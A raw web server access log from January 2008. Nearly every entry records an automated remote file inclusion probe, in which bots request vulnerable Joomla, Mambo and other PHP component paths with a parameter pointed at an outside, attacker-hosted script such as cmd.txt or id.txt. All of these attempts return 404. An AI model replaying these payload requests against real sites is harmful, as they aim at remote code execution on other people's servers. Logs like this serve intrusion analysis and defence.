64.202.124.115 - - [26/Jan/2008:06:45:59 -0800] "GET /logs/access_071230.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://sbn.poilpark.net/docu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.202.124.115 - - [26/Jan/2008:06:45:59 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://sbn.poilpark.net/docu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.202.124.115 - - [26/Jan/2008:06:45:59 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://sbn.poilpark.net/docu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.98.139.142 - - [26/Jan/2008:06:46:05 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.194.149.12 - - [26/Jan/2008:06:46:56 -0800] "GET /logs/access_071230.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [26/Jan/2008:06:46:56 -0800] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [26/Jan/2008:06:46:57 -0800] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.199.102.117 - - [26/Jan/2008:06:48:32 -0800] "GET /logs/access_071225.log//index.php?body=http://www.laila.jp/item_pics/cmd/cmd.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [26/Jan/2008:06:48:33 -0800] "GET //index.php?body=http://www.laila.jp/item_pics/cmd/cmd.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [26/Jan/2008:06:48:33 -0800] "GET /logs//index.php?body=http://www.laila.jp/item_pics/cmd/cmd.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.228.30 - - [26/Jan/2008:06:48:59 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://emodrago.altervista.org/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.184 - - [26/Jan/2008:06:49:37 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Jyxobot/1" "www.dmulk.com"
195.70.36.184 - - [26/Jan/2008:06:49:51 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "Jyxobot/1" "www.dmulk.com"
212.98.181.80 - - [26/Jan/2008:06:50:29 -0800] "GET /logs/fcomponents/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.arcil.com/phpmic.txt.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
212.98.181.80 - - [26/Jan/2008:06:50:29 -0800] "GET /fcomponents/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.arcil.com/phpmic.txt.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.38.19.90 - - [26/Jan/2008:06:50:40 -0800] "GET /logs/access_080112.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.tus-dom-esch.de/templates/l?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
140.113.4.81 - - [26/Jan/2008:06:52:14 -0800] "GET /logs/access_080106.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.113.4.81 - - [26/Jan/2008:06:52:14 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.113.4.81 - - [26/Jan/2008:06:52:19 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.38.19.90 - - [26/Jan/2008:06:53:35 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.tus-dom-esch.de/templates/l?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.88.14.236 - - [26/Jan/2008:06:55:46 -0800] "GET //components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.abilon.nl/upload/robot.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
85.88.14.236 - - [26/Jan/2008:06:55:46 -0800] "GET /logs//components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.abilon.nl/upload/robot.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
74.6.8.71 - - [26/Jan/2008:06:55:52 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.71 - - [26/Jan/2008:06:55:52 -0800] "GET /logs/access.log HTTP/1.0" 200 154330 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.176.228.30 - - [26/Jan/2008:06:57:30 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://emodrago.altervista.org/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.228.30 - - [26/Jan/2008:06:57:31 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://emodrago.altervista.org/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.228.30 - - [26/Jan/2008:06:57:31 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://emodrago.altervista.org/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [26/Jan/2008:06:58:37 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [26/Jan/2008:06:58:37 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [26/Jan/2008:06:58:38 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.139.98 - - [26/Jan/2008:06:58:52 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [26/Jan/2008:06:58:52 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [26/Jan/2008:06:58:52 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.213.194.42 - - [26/Jan/2008:06:59:19 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.47 - - [26/Jan/2008:07:00:09 -0800] "GET /logs/access_080108.log HTTP/1.0" 200 413211 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.213.194.42 - - [26/Jan/2008:07:00:31 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.141.110 - - [26/Jan/2008:07:01:18 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [26/Jan/2008:07:01:18 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [26/Jan/2008:07:01:18 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [26/Jan/2008:07:01:52 -0800] "GET /logs/access_080106.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [26/Jan/2008:07:02:49 -0800] "GET /logs/access_071225.log//index.php?body=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [26/Jan/2008:07:02:50 -0800] "GET //index.php?body=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [26/Jan/2008:07:02:50 -0800] "GET /logs//index.php?body=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.213.194.42 - - [26/Jan/2008:07:03:43 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [26/Jan/2008:07:03:43 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [26/Jan/2008:07:03:44 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.5.250.201 - - [26/Jan/2008:07:03:58 -0800] "GET /logs/access_071230.log/vwar/convert/mvcw.php?step=1&vwar_root=http://www.radioung.no/pics/www/chika????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.5.250.201 - - [26/Jan/2008:07:03:58 -0800] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.radioung.no/pics/www/chika????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.5.250.201 - - [26/Jan/2008:07:03:58 -0800] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://www.radioung.no/pics/www/chika????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.5.250.201 - - [26/Jan/2008:07:04:42 -0800] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.86.239.18 - - [26/Jan/2008:07:09:16 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://eastlink.hu/kina/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
70.86.239.18 - - [26/Jan/2008:07:09:16 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://eastlink.hu/kina/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
121.173.130.137 - - [26/Jan/2008:07:10:39 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.212.28.43 - - [26/Jan/2008:07:11:23 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.212.28.43 - - [26/Jan/2008:07:11:23 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
67.19.18.66 - - [26/Jan/2008:07:12:41 -0800] "GET /logs/access_080106.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.88.14.236 - - [26/Jan/2008:07:14:44 -0800] "GET //convert/mvcw.php?step=1&vwar_root=http://www.abilon.nl/upload/robot.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
85.88.14.236 - - [26/Jan/2008:07:14:44 -0800] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.abilon.nl/upload/robot.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
200.54.72.151 - - [26/Jan/2008:07:15:02 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.54.72.151 - - [26/Jan/2008:07:15:02 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.54.72.151 - - [26/Jan/2008:07:15:03 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.244.146.6 - - [26/Jan/2008:07:15:05 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.146.6 - - [26/Jan/2008:07:15:05 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.156.105.11 - - [26/Jan/2008:07:15:08 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [26/Jan/2008:07:15:09 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [26/Jan/2008:07:15:09 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.40.231.114 - - [26/Jan/2008:07:15:55 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [26/Jan/2008:07:15:56 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.124.28.7 - - [26/Jan/2008:07:15:57 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.40.231.114 - - [26/Jan/2008:07:15:58 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.124.28.7 - - [26/Jan/2008:07:15:58 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.124.28.7 - - [26/Jan/2008:07:16:00 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.40.231.114 - - [26/Jan/2008:07:16:02 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.98.139.142 - - [26/Jan/2008:07:17:19 -0800] "GET /logs/access_071225.log//templates/mangobery/footer.sample.php?Site_Path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.98.139.142 - - [26/Jan/2008:07:17:19 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.244.146.6 - - [26/Jan/2008:07:19:38 -0800] "GET /logs//get_reminders.php?includedir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.146.6 - - [26/Jan/2008:07:19:39 -0800] "GET //get_reminders.php?includedir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.31.64.178 - - [26/Jan/2008:07:20:19 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
150.161.5.91 - - [26/Jan/2008:07:21:31 -0800] "GET /logs//get_reminders.php?includedir=http://www.freelance-media.ca//dotproject/classes/.r/xxx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.161.5.91 - - [26/Jan/2008:07:21:32 -0800] "GET //get_reminders.php?includedir=http://www.freelance-media.ca//dotproject/classes/.r/xxx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.141.110 - - [26/Jan/2008:07:22:22 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [26/Jan/2008:07:22:23 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [26/Jan/2008:07:22:23 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:07:22:25 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.3itsgroup.it/language/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.98.139.142 - - [26/Jan/2008:07:23:38 -0800] "GET /logs/access.log//templates/mangobery/footer.sample.php?Site_Path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.5.250.201 - - [26/Jan/2008:07:24:19 -0800] "GET /logs/access_071229.log/vwar/convert/mvcw.php?step=1&vwar_root=http://www.radioung.no/pics/www/chika????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:07:25:07 -0800] "GET /logs/access_080101.log//tools/send_reminders.php?noSet=0&includedir=http://www.3itsgroup.it/language/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:07:25:08 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.3itsgroup.it/language/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:07:25:08 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.3itsgroup.it/language/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.90 - - [26/Jan/2008:07:27:07 -0800] "GET /content.php?seite=http://zal.sioru.net/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.198.92 - - [26/Jan/2008:07:27:43 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://pucorp.org/id21.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.198.92 - - [26/Jan/2008:07:27:43 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://pucorp.org/id21.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:07:28:22 -0800] "GET /logs/access_071231.log//tools/send_reminders.php?noSet=0&includedir=http://www.3itsgroup.it/language/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.46.178 - - [26/Jan/2008:07:30:16 -0800] "GET /logs/access_080106.log//admin.php?include_path=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.46.178 - - [26/Jan/2008:07:30:16 -0800] "GET //admin.php?include_path=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.46.178 - - [26/Jan/2008:07:30:17 -0800] "GET /logs//admin.php?include_path=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.46.178 - - [26/Jan/2008:07:30:21 -0800] "GET /logs/access_071214.log//admin.php?include_path=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.141.110 - - [26/Jan/2008:07:30:47 -0800] "GET /logs/access_071224.log/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [26/Jan/2008:07:30:48 -0800] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [26/Jan/2008:07:30:48 -0800] "GET /logs/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [26/Jan/2008:07:32:59 -0800] "GET /logs/access.log/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.31.64.178 - - [26/Jan/2008:07:33:19 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.31.64.178 - - [26/Jan/2008:07:33:19 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.194.149.12 - - [26/Jan/2008:07:34:03 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [26/Jan/2008:07:34:04 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [26/Jan/2008:07:34:04 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [26/Jan/2008:07:35:22 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
121.173.130.137 - - [26/Jan/2008:07:35:23 -0800] "GET /logs/access_080106.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.173.130.137 - - [26/Jan/2008:07:35:24 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.5.250.201 - - [26/Jan/2008:07:35:25 -0800] "GET /logs/access_071230.log/vwar/convert/mvcw.php?step=1&vwar_root=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.5.250.201 - - [26/Jan/2008:07:35:25 -0800] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.173.130.137 - - [26/Jan/2008:07:35:34 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:07:37:47 -0800] "GET /logs/access_080106.log//get_reminders.php?includedir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:07:37:49 -0800] "GET //get_reminders.php?includedir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
